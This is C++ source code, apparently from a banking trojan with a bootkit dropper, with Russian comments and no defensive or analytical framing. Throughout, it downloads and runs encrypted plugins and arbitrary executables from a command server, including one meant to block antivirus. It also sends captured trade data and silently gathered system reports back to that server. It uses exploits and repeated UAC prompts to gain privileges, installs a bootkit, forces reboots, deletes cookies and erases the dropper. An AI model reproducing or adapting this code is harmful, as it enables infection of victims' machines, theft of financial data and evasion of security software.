PCHAR GetPathToMsInfo32() { int FolderId = CSIDL_SYSTEM; const char* PathSuffix = "\\"; OSVERSIONINFOEXA ver; m_memset(&ver, 0, sizeof(ver)); ver.dwOSVersionInfoSize = sizeof(ver); if (!(BOOL)pGetVersionExA(&ver)) return NULL; if (ver.dwMajorVersion == 5) { FolderId = CSIDL_PROGRAM_FILES; PathSuffix = "\\Common Files\\Microsoft Shared\\MSInfo\\"; } PCHAR Path = STR::Alloc(2 * MAX_PATH); m_memset(Path, 0, STR::Length(Path)); pSHGetSpecialFolderPathA(NULL, Path, FolderId, false); m_lstrcat(Path, PathSuffix); m_lstrcat(Path, "msinfo32.exe"); return Path; }
bool TryToCatchHostLevelInstanceMutex(const char* MutexPrefix) { CHAR mutex_name[200]; m_memset(mutex_name, 0, sizeof(mutex_name)); PCHAR machine_id = MakeMachineID(); m_lstrcat(mutex_name, "Global\\"); m_lstrcat(mutex_name, MutexPrefix); m_lstrcat(mutex_name, machine_id); STR::Free(machine_id); LDRDBG("TryToCatchHostLevelInstanceMutex", "Mutex name '%s'.", mutex_name); SECURITY_ATTRIBUTES sa; SECURITY_DESCRIPTOR sd; pInitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION); pSetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE); sa.nLength = sizeof (SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = &sd; sa.bInheritHandle = FALSE; HANDLE mutex_handle = (HANDLE)pCreateMutexA(&sa, FALSE, mutex_name); if (mutex_handle == NULL) return false; // Catch ownership of mutex and never release DWORD wait_result = (DWORD)pWaitForSingleObject(mutex_handle, 1000); if (wait_result == WAIT_OBJECT_0) return true; pCloseHandle(mutex_handle); return false; }
int DeleteIECookies(int os, HCAB hCab) { char username[256]; DWORD name_len = 256; if(!(BOOL)pGetUserNameA(&username[0], &name_len)) return 0; //return 10; char *Path_cookies = NULL; switch(os) { case 1: Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Documents and Settings\\")+name_len+m_lstrlen("\\Cookies")); m_lstrcpy(Path_cookies,"C:\\Documents and Settings\\"); m_lstrcat(Path_cookies,&username[0]); m_lstrcat(Path_cookies,"\\Cookies\\"); break; case 2: Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Users\\")+name_len+m_lstrlen("\\AppData\\Roaming\\Microsoft\\Windows\\Cookies")); m_lstrcpy(Path_cookies,"C:\\Users\\"); m_lstrcat(Path_cookies,&username[0]); m_lstrcat(Path_cookies,"\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\"); break; default: return -1; } DeleteFiles(Path_cookies, "*.txt", true, false, hCab); /* if(Path_cookies == NULL) return -1; WIN32_FIND_DATA data; char *Path_cookies_find = (char*)MemAlloc(m_lstrlen(Path_cookies)+2); m_lstrcpy(Path_cookies_find,Path_cookies); m_lstrcat(Path_cookies_find,"\\*"); HANDLE nFindFile = FindFirstFile(Path_cookies_find,&data); if(nFindFile==NULL) return -1; do { if(m_lstrcmp(data.cFileName,".")==0 || m_lstrcmp(data.cFileName,"..")==0) continue; char *Path_file = (char*)MemAlloc(m_lstrlen(Path_cookies)+m_lstrlen(data.cFileName)+1); m_lstrcpy(Path_file,Path_cookies); m_lstrcat(Path_file,"\\"); m_lstrcat(Path_file,data.cFileName); if(!DeleteFile(Path_file)) { DWORD err = pGetLastError(); } //MemFree(Path_file); } while(FindNextFile(nFindFile,&data)); FindClose(nFindFile); //MemFree(Path_cookies);*/ return 0; }
BOOL SaveManifest(PCHAR FileName) { PCHAR manifest = STR::Alloc(1024); BOOL ret; manifest[0] = 0; for ( int i =0; i< sizeof(Manifest)/sizeof(Manifest[0]); ++i) { m_lstrcat(manifest,Manifest[i]); m_lstrcat(manifest,"\r\n"); }; ret = File::WriteBufferA(FileName,manifest,m_lstrlen(manifest)); STR::Free(manifest); return ret; };
DWORD WINAPI AvBlockThread( LPVOID lpData ) { if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES ) { return 0; } char *Host = GetCurrentHost(); if ( Host == NULL ) { return 0; } char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0}; char AvBlockUrl[256]; m_lstrcpy( AvBlockUrl, Host ); m_lstrcat( AvBlockUrl, AvBlockFile ); LPBYTE BotModule = NULL; DWORD dwModuleSize = 0; while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) ) { pSleep( 1000 * 60 * 5 ); } if ( BotModule != NULL && dwModuleSize ) { LPVOID FileData = MemAlloc( dwModuleSize + 1 ); if ( FileData ) { m_memcpy( FileData, BotModule, dwModuleSize ); File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize ); MemFree( FileData ); } LPVOID Module = DecryptPlugin( BotModule, dwModuleSize ); if ( Module ) { HMEMORYMODULE hLib = MemoryLoadLibrary( Module ); if ( hLib == NULL ) { return 0; } MemoryFreeLibrary( hLib ); } } return 0; }
char* CalcNtldrMd5(char* Buffer, DWORD BufferSize) { CHAR path[MAX_PATH]; pGetWindowsDirectoryA(path, MAX_PATH); path[3] = '\0'; m_lstrcat(path, "ntldr"); m_memset(Buffer, 0, BufferSize); string md5 = MD5StrFromFileA(path); if (md5.IsEmpty()) return NULL; if (BufferSize < 33) return NULL; m_lstrcat(Buffer, md5.t_str()); return Buffer; }
// // получаем путь к дроперу для его удаления. // VOID GetPaths() { BOOL bUsed; PWCHAR buf = (PWCHAR)MemAlloc(sizeof(WCHAR)*MAX_PATH); if ( buf ) { pGetModuleFileNameW(NULL,buf,MAX_PATH-1); //pOutputDebugStringW(buf); pWideCharToMultiByte(CP_ACP,0,buf,-1,FileToDelete,sizeof(FileToDelete)-1,NULL,&bUsed); //pOutputDebugStringA(FileToDelete); PP_DPRINTF(L"GetPaths: FileToDelete='%S'", FileToDelete); buf[0]= 0; pSHGetSpecialFolderPathW(NULL,buf,CSIDL_COMMON_APPDATA ,TRUE); pWideCharToMultiByte(CP_ACP,0,buf,-1,PathBkFile,sizeof(PathBkFile)-1,NULL,&bUsed); MemFree(buf); m_lstrcat(PathBkFile,"\\"); m_lstrcat(PathBkFile,MakeMachineID()); PP_DPRINTF(L"GetPaths: PathBkFile='%S'",PathBkFile); }; };
PCHAR GetBootkitSignalFileName() { PCHAR Path= STR::Alloc(MAX_PATH); PCHAR UID=STR::Alloc(120); pGetSystemDirectoryA(Path,MAX_PATH); GenerateUid(UID); Path[3]='\0'; PCHAR Pref= STR::GetRightStr(UID,"0"); m_lstrcat(Path, Pref); STR::Free(Pref); STR::Free(UID); return Path; }
/************************************************************************/ //* Надо ещё сделать парную для MemAlloc очистку памяти в этой процедуре*/ BOOL Delete_IECookies_Norm(BOOL bDeleteCookies, BOOL bDeleteCookiesIndex) { DbgMsg("Delete_IECookies_Norm",0,"START"); char szUserProfile[200]; char szFilePath[200]; HANDLE hCacheEnumHandle = NULL; LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL; DWORD dwSize = 4096; // initial buffer size // Delete index.dat if requested. Be sure that index.dat is not locked. if(bDeleteCookiesIndex) { // Retrieve from environment user profile path. pExpandEnvironmentStringsA("%userprofile%", &szUserProfile[0], sizeof(szUserProfile)); m_memset(&szFilePath[0], 0, sizeof(szFilePath)); //m_memcpy(&szFilePath[0],&szUserProfile[0], m_wcslen(&szUserProfile[0])*sizeof(WCHAR)); //m_memcpy(&szFilePath[m_wcslen(&szUserProfile[0])],L"\\Cookies\\index.dat", 36); m_lstrcpy(&szFilePath[0], &szUserProfile[0]); m_lstrcat(&szFilePath[0], "\\Cookies\\index.dat"); // wsprintfW(szFilePath, L"%s%s", szUserProfile, L"\\Cookies\\index.dat"); m_lstrcpy(&szFilePath[0], "C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat"); pDeleteFileA(szFilePath); DbgMsg("Delete_IECookies_Norm",0,&szFilePath[0]); DWORD err = pGetLastError(); DbgMsg("Delete_IECookies_Norm",err,"pDeleteFileW"); if(!bDeleteCookies) return TRUE; } // Enable initial buffer size for cache entry structure. //lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize]; lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize); lpCacheEntry->dwStructSize = dwSize; // URL search pattern (1st parameter) options are: "cookie:", "visited:", // or NULL ("*.*"). hCacheEnumHandle = pFindFirstUrlCacheEntryA(_T("cookie:") /* in */, lpCacheEntry /* out */, &dwSize /* in, out */); // First, obtain handle to internet cache with FindFirstUrlCacheEntry // for late use with FindNextUrlCacheEntry. if(hCacheEnumHandle != NULL) { pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName); DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]); } else { switch(pGetLastError()) { case ERROR_INSUFFICIENT_BUFFER: MemFree(lpCacheEntry); //lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize]; lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize); lpCacheEntry->dwStructSize = dwSize; // Repeat first step search with adjusted buffer, exit if not // found again (in practice one buffer's size adustment is // always OK). hCacheEnumHandle = pFindFirstUrlCacheEntryA(NULL, lpCacheEntry, &dwSize); if(hCacheEnumHandle != NULL) { pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName); DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]); break; } else { // FindFirstUrlCacheEntry fails again, return. MemFree(lpCacheEntry); return FALSE; } default: pFindCloseUrlCache(hCacheEnumHandle); MemFree(lpCacheEntry); return FALSE; } } // Next, use hCacheEnumHandle obtained from the previous step to delete // subsequent items of cache. do { // Notice that return values of FindNextUrlCacheEntry (BOOL) and // FindFirstUrlCacheEntry (HANDLE) are different. if((BOOL)pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, &dwSize)) { pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName); DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]); } else { switch(pGetLastError()) { case ERROR_INSUFFICIENT_BUFFER: //lpCacheEntry = //(LPINTERNET_CACHE_ENTRY_INFO); MemFree(lpCacheEntry); //new char[dwSize]; lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize); lpCacheEntry->dwStructSize = dwSize; // Repeat next step search with adjusted buffer, exit if // error comes up again ((in practice one buffer's size // adustment is always OK). if(pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, &dwSize)) { pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName); DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]); break; } else { // FindFirstUrlCacheEntry fails again, return. pFindCloseUrlCache(hCacheEnumHandle); MemFree(lpCacheEntry); return FALSE; } break; case ERROR_NO_MORE_ITEMS: pFindCloseUrlCache(hCacheEnumHandle); MemFree(lpCacheEntry); return TRUE; default: pFindCloseUrlCache(hCacheEnumHandle); MemFree(lpCacheEntry); return FALSE; } } } while (TRUE); return FALSE; // never here }
bool ReportToPlugin( char *Url ) { WSADATA wsa; if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 ) { return false; } char *Host = NULL; char *Path = NULL; int Port = 0; if ( !ParseUrl1( Url, &Host, &Path, &Port ) ) { return false; } char Uid[100]; GenerateUid( Uid ); typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... ); fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 ); char *UserAgent = NULL; UserAgent = (char*)MemAlloc( 1024 ); DWORD dwUserSize = 1024; pObtainUserAgentString( 0, UserAgent, &dwUserSize ); if ( UserAgent == NULL ) { MemFree( UserAgent ); UserAgent = "-"; } char Request[] = "POST %s HTTP/1.0\r\n" "Host: %s\r\n" "User-Agent: %s\r\n" "Accept: text/html\r\n" "Connection: Close\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: %d\r\n\r\n"; char Args[] = "id="; char *HttpPacket = NULL; HttpPacket = (char*)MemAlloc( 2048 ); int iTmp; if (LoadExe!=NULL) { iTmp=m_lstrlen(LoadExe); }else iTmp=9; pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp ); m_lstrcat( HttpPacket, Args ); m_lstrcat( HttpPacket, Uid ); if (LoadExe==NULL) { LoadExe = (char*)MemAlloc(10); m_lstrncpy(LoadExe,"&plugins=",9); LoadExe[9]='\0'; } m_lstrcat( HttpPacket, LoadExe ); SOCKET Socket = MyConnect1( Host, Port ); if( Socket == -1 ) { return false; } bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) ); MemFree( HttpPacket ); if ( !b ) { return false; } DWORD dwSize = 0; char *Buffer = RecvAndParse( Socket, &dwSize ); if ( !Buffer ) { pclosesocket( Socket ); return false; } char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0}; char *Context; m_strtok_s( Buffer, "\r\n", &Context ); if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) ) { char * cPointer= m_strstr(&Buffer[1],"http:"); char* cUrl=Buffer; char* cUrlNext; int i; char *DownloadUrl; while (true) { cUrl= m_strstr(&cUrl[1],"http:"); if (cUrl==NULL)break; cUrlNext= m_strstr(cUrl,"|"); i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext); DownloadUrl = (char*)MemAlloc(i)+1; m_lstrncpy(DownloadUrl,cUrl,i); DownloadUrl[i]='\0'; if ( DownloadUrl ) { LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1); m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str()); m_lstrcat( LoadExe, "|"); WCHAR *FileName =(WCHAR *)GetTempName(); if ( FileName && DownloadUrl ) { ExecuteFile( DownloadUrl, FileName ); } MemFree( FileName ); } MemFree( DownloadUrl ); } } MemFree( Buffer ); pclosesocket( Socket ); return true; }
// Ф-ция, которая вызывается при инжекте в другие процессы. // Проверяет свои права и пробует их расширить для DWORD WINAPI ExplorerRoutine( LPVOID lpData ) { // // Cоздадим отдельный поток для удаления так как дропер может удаляться больше минуты. // BOOL bRun = TRUE; BOOL bRet = FALSE; BOOL IsUsedExploit = FALSE; OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0}; UnhookDlls(); BuildImport((PVOID)GetImageBase()); PP_DPRINTF(L"ExplorerRoutine: started"); if (! IsUserAdmin() ) { PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges."); switch ( TakePrivileges() ) { case 0: case 2: bRun = FALSE; break; }; PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun); IsUsedExploit = TRUE; // По идее это всегда TRUE }; if ( bRun ) { PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet); } /* Если есть права Админа но мы не юзали сплоеты и инстал не удался, юзаем сплоеты и снова делаем инстал */ if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) ) { PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges"); IsUsedExploit = TRUE; switch ( TakePrivileges() ) { case 0: case 2: bRun = FALSE; break; }; if ( bRun ) { PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet); } }; pGetVersionExA(&OSVer); /* Выкидываем длл на диск и юзаем сплойт спуллера, только XP */ if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5)) { PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit"); DWORD DropSize = 0; PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize); if ( DropImage && DropSize) { PCHAR DropFile = File::GetTempNameA(); File::WriteBufferA(DropFile,DropImage,DropSize); SpoolerBypass(DropFile); STR::Free(DropFile); }; }; /* Запуск много раз копии дропера с прошением повышенных прав. */ if ( bRet == FALSE ) { PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle"); PCHAR tmpexe,dir,file ; PCHAR tmp_manifest; PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX"); if ( NamePrefix ) do { tmpexe = File::GetTempNameA(); tmp_manifest = STR::Alloc(MAX_PATH+1); dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ; file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ; if ( tmp_manifest && dir && file) { STR::Free(tmpexe); tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe"); if ( ! tmpexe ) return 0; m_lstrcpy(tmp_manifest,tmpexe); m_lstrcat(tmp_manifest,".manifest"); }; if ( tmpexe && tmp_manifest ) if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) ) { DWORD dwCode = -1; SHELLEXECUTEINFOA ExecInfo; m_lstrcpy(tmp_manifest,tmpexe); m_lstrcat(tmp_manifest," "); m_lstrcat(tmp_manifest,ARGV_UAC_RUN); ExecInfo.cbSize = sizeof(ExecInfo); ExecInfo.lpFile = tmpexe; ExecInfo.lpParameters = tmp_manifest; ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS; for ( int i = 0; i < 10; ++i ) { PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest); if ( pShellExecuteExA(&ExecInfo) == FALSE ) break; pWaitForSingleObject(ExecInfo.hProcess,INFINITE); pGetExitCodeProcess(ExecInfo.hProcess,&dwCode); if ( dwCode == 0 ) { PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest); break; } } }; if ( tmpexe ) STR::Free(tmpexe); if ( tmp_manifest ) STR::Free(tmp_manifest); if ( dir ) STR::Free(dir); if ( file ) STR::Free(file); } while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do, цикл пока не появится Файл буткита if ( NamePrefix ) STR::Free(NamePrefix); }; /* Если инстал был не удачный снова пробуем вдруг повезет*/ if ( bRet == FALSE) { PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain"); bRet = ExplorerMain(); PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet); } /* Удаляем дропер */ PP_DPRINTF(L"ExplorerRoutine: Start to delete droper"); pCloseHandle(StartThread(DeleteDropper,NULL)); if ( dwExplorerSelf ) { PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()"); pExitProcess(0); } return 0; }
// Ф-ция, которая после проверок вызывает события старта в процессе Explorer, // что в свою очередь вызывает установку BkDll BOOL ExplorerMain() { BOOL ret = FALSE; bool BkInstalledSuccess = false; PP_DPRINTF(L"ExplorerMain: started"); // Вызываем событие старта експлорера if ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) { PP_DPRINTF(L"ExplorerMain: BkFile not exists. Runing ExplorerStart()"); if ( ExplorerStart(NULL) ) { ret = TRUE; BkInstalledSuccess = true; PP_DPRINTF(L"ExplorerMain: ExplorerStart() finished successfuly. Saving 0x00000001 in '%S'", PathBkFile); // Записываем в BkFile 4 байта с единичкой. File::WriteBufferA(PathBkFile,&ret,sizeof(BOOL)); } } else { PP_DPRINTF(L"ExplorerMain: BkFile exists."); ret = TRUE; }; if ( ret ) { // Если проверка находит файл Bk или возвращает успех при установке - // создается файл в системном корне с 4 байтами адреса строки. // Этот файл проверяется ring3 ботом, который запустил дропер буткита. // При нахождении этого файла он будет пытатся удалить себя из автозапуска. PCHAR Path= STR::Alloc(MAX_PATH); PCHAR UID=STR::Alloc(120); pGetSystemDirectoryA(Path,MAX_PATH); GenerateUid(UID); Path[3]='\0'; PCHAR Pref= STR::GetRightStr(UID,"0"); m_lstrcat(Path, Pref); PP_DPRINTF(L"ExplorerMain: Bk installed. Creating file '%S'", Path); File::WriteBufferA(Path,&Path,sizeof(PCHAR)); STR::Free(Pref); STR::Free(UID); STR::Free(Path); }; if (BkInstalledSuccess) { DWORD thid = 0; PP_DPRINTF(L"ExplorerMain: starting reboot thread and reboot notify thread"); pCreateThread(NULL, 0, RebootThread, NULL, 0, &thid); pCreateThread(NULL, 0, RebootNotifyThread, NULL, 0, &thid); } PP_DPRINTF(L"ExplorerMain: finished."); return ret; }
void DebugReportCreateConfigReportAndSend() { PCHAR MsInfoPath = NULL; PCHAR MsInfoParam = NULL; PCHAR ReportPath = NULL; PCHAR CabPath = NULL; DebugReportSettings* settings = DebugReportGetSettings(); DBGRPTDBG("DebugReportCreateConfigReportAndSend", "Started with settings: Enabled='%d' StatPrefix='%s' StatUrl='%s'", settings->Enabled, settings->StatPrefix, settings->StatUrl ); if (!settings->Enabled) return; do { // Получаем путь к msinfo32.exe MsInfoPath = GetPathToMsInfo32(); DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetPathToMsInfo32() return '%s;", MsInfoPath); if (MsInfoPath == NULL) break; // Временный файл для отчета ReportPath = File::GetTempNameA(); DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetTempNameA() for report file return '%s;", ReportPath); if (ReportPath == NULL) break; MsInfoParam = STR::Alloc(2 * MAX_PATH); if (MsInfoParam == NULL) break; PROCESS_INFORMATION pi; STARTUPINFOA si; m_memset(&si, 0, sizeof(si)); m_memset(&pi, 0, sizeof(pi)); m_memset(MsInfoParam, 0, STR::Length(MsInfoParam)); // Запускаем скрытно si.cb = sizeof(si); si.wShowWindow = SW_HIDE; m_lstrcat(MsInfoParam, " /report \""); m_lstrcat(MsInfoParam, ReportPath); m_lstrcat(MsInfoParam, "\""); DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess('%s', '%s')", MsInfoPath, MsInfoParam); BOOL process_result = (BOOL)pCreateProcessA(MsInfoPath, MsInfoParam, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess return %d.(ph=0x%X pid=%d)", process_result, pi.hProcess, pi.dwProcessId); if (process_result == FALSE) break; if (pi.hProcess == NULL) break; if (pi.hProcess != NULL) { DBGRPTDBG("DebugReportCreateConfigReportAndSend", "Waiting for msinfo32."); pWaitForSingleObject(pi.hProcess, INFINITE); pCloseHandle(pi.hProcess); } if (pi.hThread != NULL) pCloseHandle(pi.hThread); DWORD attributes = (DWORD)pGetFileAttributesA(ReportPath); DBGRPTDBG("DebugReportCreateConfigReportAndSend", "'%s' attibutes 0x%X.", ReportPath, attributes); if (attributes == INVALID_FILE_ATTRIBUTES) break; CabPath = File::GetTempNameA(); HCAB CabHandle = CreateCab(CabPath); DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateCab() return 0x%X.", CabHandle); if (CabHandle == NULL) break; AddFileToCab(CabHandle, ReportPath, "sysinfo.txt"); CloseCab(CabHandle); DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sending sysinfo report."); string BotUid = GenerateUidAsString(settings->StatPrefix); DebugReportSendSysInfo(BotUid.t_str(), settings->StatUrl, CabPath); DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sysinfo report sent."); } while (false); if (ReportPath != NULL) pDeleteFileA(ReportPath); if (CabPath != NULL) pDeleteFileA(CabPath); if (ReportPath != NULL) STR::Free(ReportPath); if (CabPath != NULL) STR::Free(CabPath); if (MsInfoPath != NULL) STR::Free(MsInfoPath); DebugReportFreeSettings(settings); DBGRPTDBG("DebugReportCreateConfigReportAndSend", "finished."); }
bool SendTradeInfo( char *Buffer ) { string Serv = GetActiveHost(); if ( Serv.IsEmpty()) return 0; char Host[30]; m_lstrcpy( Host, Serv.t_str()); char Script[] = {'/','g','e','t','/','t','r','a','.','h','t','m','l',0}; char Args[] = "id=%s&data=%s"; char Request[] = "POST %s HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: %s\r\n" "Accept: text/html\r\n" "Connection: Close\r\n" "Content-Type: application/x-www-form-urlencoded\r\n" "Content-Length: %d\r\n\r\n"; char Uid[100]; GenerateUid( Uid ); char *Data = URLEncode( Buffer ); char *PartReq = (char*)MemAlloc( 1024 ); typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... ); fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 ); if ( PartReq == NULL ) { return false; } _pwsprintfA( PartReq, Args, Uid, Data ); char *Header = (char*)MemAlloc( 1024 ); if ( Header == NULL ) { MemFree( PartReq ); return false; } char *UserAgent = (char*)MemAlloc( 1024 ); DWORD dwUserSize = 1024; pObtainUserAgentString( 0, UserAgent, &dwUserSize ); _pwsprintfA( Header, Request, Script, Host, UserAgent, m_lstrlen( PartReq ) ); MemFree( UserAgent ); char *SendBuffer = (char*)MemAlloc( m_lstrlen( PartReq ) + m_lstrlen( Header ) + 1 + 2 ); if ( SendBuffer == NULL ) { MemFree( PartReq ); MemFree( Header ); return false; } m_lstrcpy( SendBuffer, Header ); m_lstrcat( SendBuffer, PartReq ); m_lstrcat( SendBuffer, "\r\n" ); MemFree( Header ); MemFree( PartReq ); SOCKET Socket = MyConnect( Host, 80 ); bool Ret = MySend( Socket, (const char *)SendBuffer, m_lstrlen( SendBuffer ) ); pclosesocket( Socket ); MemFree( SendBuffer ); return Ret; }
bool AsyncDownload1( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize ) { WSADATA wsa; if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 ) { return false; } char *Host = NULL; char *Path = NULL; int Port = 80; if ( !ParseUrl( Url, &Host, &Path, &Port ) ) { return false; } SOCKET Socket = MyConnect( Host, Port ); if( Socket == -1 ) { return false; } char *UserAgent = NULL; UserAgent = (char*)MemAlloc( 1024 ); DWORD dwUserSize = 1024; pObtainUserAgentString( 0, UserAgent, &dwUserSize ); char *query=(char*)MemAlloc(2048); m_lstrcpy(query,"GET /"); m_lstrcat(query,Path); m_lstrcat(query," HTTP/1.1\r\nAccept: */* \r\n "); m_lstrcat(query,"Accept-Language: ru \r\n"); m_lstrcat(query,"UA-CPU: x86 \r\n"); m_lstrcat(query,"Accept-Encoding: gzip, deflate \r\n"); m_lstrcat(query,"User-Agent: "); m_lstrcat(query,UserAgent); m_lstrcat(query,"\r\nHost: "); m_lstrcat(query,Host); m_lstrcat(query,"\r\nConnection: Close\r\n\r\n\r\n"); bool b = MySend( Socket, (const char *)query, m_lstrlen( query ) ); MemFree( Host ); //MemFree( Path ); MemFree( UserAgent ); MemFree( query ); if ( !b ) { return false; } DWORD dwSizeFile = 0; char *Buffer = RecvAndParse( Socket, &dwSizeFile ); if ( !Buffer ) { pclosesocket( Socket ); return false; } if ( dwSize ) { *lpBuffer = (LPBYTE)Buffer; *dwSize = dwSizeFile; return true; } return false; }